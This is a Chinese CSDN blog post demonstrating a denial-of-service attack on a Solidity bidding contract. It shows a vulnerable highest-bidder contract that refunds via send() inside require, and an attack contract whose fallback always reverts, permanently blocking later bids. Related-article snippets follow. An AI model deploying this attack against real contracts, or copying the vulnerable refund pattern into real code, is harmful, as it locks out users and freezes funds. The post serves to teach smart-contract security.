solidity合约DOS攻击

最新推荐文章于 2022-11-23 21:57:26 发布
最新推荐文章于 2022-11-23 21:57:26 发布
阅读量4.7k 收藏 2
点赞数 1
分类专栏: 智能合约 文章标签: 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38935605/article/details/124300721
版权 
pragma solidity ^0.5.1;
//业务逻辑,谁给的钱多我就记录谁,并且把上个人的钱退回去
contract longTest2{
    
    address payable add;
    uint256 public code;

    function setAdd()public payable returns(uint256){
        require(msg.value > code);
        require(add.send(code));
        code = msg.value;
        add = msg.sender;
        return code;
    }
}



pragma solidity ^0.5.1;
interface Aunt{
    function setAdd()external payable;
}
//攻击合约
contract longTest{
    Aunt auntPas = Aunt(0xB302F922B24420f3A3048ddDC4E2761CE37Ea098);
    function set()public payable {
         auntPas.setAdd.value(msg.value)();
    }

    //写个回滚函数,我给出去一次钱一后后面给的钱多的人无法调用,意思就是我钱已经给了,你退回来我不要
    function() external payable{
        revert();
    }
}

破 风
关注
专栏目录
使用Hash碰撞进行DoS攻击
zhaohong_bo的专栏
05-22 1921
一、哈希表碰撞攻击的基本原理 哈希表是一种查找效率极高的数据结构,很多语言都在内部实现了哈希表。PHP中的哈希表是一种极为重要的数据结构,不但用于表示Array数据类型,还在Zend虚拟机内部用于存储上下文环境信息(执行上下文的变量及函数均使用哈希表结构存储)。 理想情况下哈希表插入和查找操作的时间复杂度均为O(1),任何一个数据项可以在一个与哈希表长度无关的时间内计算出一个哈希值(key),然后...
智能合约安全陷阱和开发建议
Ethan Zhang
07-09 3234
Solidity作为一种图灵完备的高级语言,可以支持逻辑比较复杂的智能合约的编写。一般情况下,Solidity开发者可以根据自己的意愿和预期开发一个智能合约项目。同时也不能保证,没有黑客攻击的存在。因此呢,确保安全性在Solidity开发中极为重要。 今天我们要介绍的常见智能合约安全陷阱包括如下: 函数可重入 跨函数资源共享 整数溢出漏洞 gas限制和循环 tx.orign和msg.sender...
solidity智能合约[51]-安全—dos***
weixin_33862188的博客
11-29 174
Dos***dos***也叫做拒绝服务***,通过使程序操作无效完成***的目的。下面的一段合约是2016年KotET(“纷争时代”)合约,其遭受了dos***。本小节将揭开此合约被***的秘密。源代码在下面KotET合约代码中,模拟了争夺皇位的功能。只有出价最高的人才能够夺得桂冠。 合约中的bid方法正是最核心的竞价合约。只有当msg.value即附带的以太币大于当前最大的...
【100个Solidity使用技巧】2、交易回滚攻击
qq_41943430的博客
08-13 675
【100个Solidity使用技巧】2、交易回滚攻击
智能合约审计之DDOS概述
Fly_鹏程万里
07-16 1199
拒绝服务(DOS) 对智能合约进行DOS攻击的方法有很多种,其根本的目的是使合约在一段时间内或者永久无法正常运行,通过拒绝服务攻击,也可以使合约中的ether永远无法提取出来,下面将会列出几种常见的攻击场景: 未设定Gas费用的外部调用 在这种情况下,您可能希望对未知合同进行外部调用并继续处理事务,而不管该调用是否失败,通常通过call操作码来实现的,如果调用失败,调用操作码不会还原事务(有关更多详细信息和示例) 案例分析 下面我们考虑一个简单的例子,我们有一个钱包合约,当调用withdraw(.
智能合约Hash碰撞引发的DoS攻击及其防御
DongAoTony的博客
03-31 412
Solidity中的Mapping可以看作是哈希表,它是一种极为重要的数据结构。但对于攻击方来讲,一旦找到它Hash函数的漏洞,solidity智能合约应对不合理,也是会招致DoS潜在风险。
猿创征文 | Solidity 智能合约技术成长之路
weixin_45267471的博客
09-12 2669
Solidity 智能合约开发成长路线
Solidity vs. Vyper:不同的智能合约语言的优缺点
最新发布
ChainlinkO的博客
11-23 1978
本文探讨以下问题:哪种智能合约语言更有优势,Solidity、Vyper、Huff 和 Yul ?最近,关于哪种是“最好的”智能合约语言存在很多争论,当然了,每一种语言都有适用的场景。这篇文章是为了最根本的问题:我应该使用哪一种智能合约语言?
智能合约漏洞攻击事件_智能合约百科全书攻击漏洞
weixin_26747751的博客
09-14 6277
智能合约漏洞攻击事件Applications on Ethereum manage financial value, making security absolutely crucial. As a nascent, experimental technology, smart contracts have certainly had their fair share of attacks. 以太...
Solidity智能合约中的安全性与异常处理
## 1.1 Solidity智能合约的重要性 Solidity是一种智能合约编程语言,用于在以太坊区块链上开发去中心化应用(DApps)。智能合约允许开发者在区块链上创建可自动执行的代码,从而实现数字资产的管理、交易和逻辑运行...
函数修改器Modifiers用法总结(为函数增加一个判断条件,条件为True才会执行)
weixin_43343144的博客
03-04 1662
solidity的函数修改器类似于Python的装饰器 // 不带参数的函数修改器用法 pragma solidity ^0.5.1; import { Hello } from "./test.sol" ; contract Test001 is Hello { uint value = 2; function get_value() public view ...
solidity之import用法总结(类似于ES6)
weixin_43343144的博客
03-04 4063
# test.sol文件 pragma solidity ^0.5.1; contract Hello { uint value; function hello() public view returns(string memory){ return "hello word"; } function set(uint ...
解密智能合约TOP10安全漏洞
softgmx的博客
11-22 1万+
以下都是来自我的新作《解密EVM机制及合约安全漏洞》里的内容 电子版PDF下载:https://download.csdn.net/download/softgmx/10800947   重入问题 漏洞成立的条件: 合约调用带有足够的gas 有转账功能(payable) 状态变量在重入函数调用之后 底层转账函数 防重入 错误处理 ...
solidity智能合约编程(进阶)
HurryPotter
05-19 593
1)合约转账三种方式: 1. address.transfer(uint256 acount):失败抛出异常(触发revert),发送2300gas,不可调节; 2. address.send((uint256 acount):失败返回false,发送2300gas,不可调节; 3. address.call.value(uint256 acount)():失败返回false,发送全部gas,可调节(.gas(uint256 gasAmount)); 2)tx.origin与msg.sender区别:
Solidity中memory在0.5和0.4不同版本的区别
终生学习
05-23 1553
Solidity中memory在0.5和0.4不同版本用法有些区别, 0.5的string变量需要在传值的时候加上memory 以下是0.4版本代码: pragma solidity ^0.4.4; contract a1 { string _name; function a1(string name) { _name = name; } funct...
go-ethereum-code-analysis 以太坊源码分析
热门推荐
omnispace的博客
02-11 1万+
分析go-ethereum的过程,我希望从依赖比较少的底层技术组件开始,慢慢深入到核心逻辑。目录go-ethereum代码阅读环境搭建以太坊黄皮书 符号索引rlp源码解析trie源码分析ethdb源码分析rpc源码分析p2p源码分析eth协议源码分析core源码分析区块链索引 chain_indexer源码分析布隆过滤器索引 bloombits源码分析以太坊的trie树管理 回滚等操作 state...
以太坊智能合约Solidity的0.5
u012310362的博客
10-15 2131
Solidity v0.5.0重大变化 注意 使用Solidity v0.5.0编译的合约仍然可以与合约甚至是使用旧版本编译的库进行交互,而无需重新编译或重新部署它们。更改接口以包括数据位置和可见性以及可变性说明符就足够了。 仅语义更改 本节列出了仅语义的更改,因此可能隐藏现有代码中的新行为和不同行为。 • 有符号右移现在使用适当的算术移位,即向负无穷大舍入,而不是向零舍入。有符号和无符号的转换将...
Solidity(5)
sunniy27的博客
12-21 3798
1.合约Solidity合约有点类似面向对象语言中的类。合约中有用于数据持久化的状态变量(state variables),和可以操作他们的函数。调用另一个合约实例的函数时,会执行一个EVM函数调用,这个操作会切换执行时的上下文,这样,前一个合约的状态变量(state variables)就不能访问了。1.1 创建合约IDEs,例如Remix,UI更好。通过使用JavaScript API web
solidity0.5.x笔记(1)-值类型
Ethan Zhang
04-30 818
值类型和引用类型的区别 Solidity变量类型分为两大类——值类型、引用类型 值类型:变量的存储空间存的是变量的数据 引用类型:变量的存储空间存的是变量数据所在的存储空间的地址 **注意:**值传递和引用传递。值类型的变量,赋值是简单的值传递,即两个变量占有独立的存储区域。引用类型赋值传递的是变量的引用,即两个变量指向同一存储区域 值类型——布尔 (bool) bool: 只有两种值true...
自定义Solidity合约实现:PetToken与ERC721详解
本篇文章是关于使用Solidity语言从头编写一个简单的智能合约的教程,以实现一个名为"PetToken"的代币。该合约是在以太坊区块链上运行的,并基于两个外部库:`PetFactory.sol` 和 `ECR712.sol`。作者在GitHub仓库`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值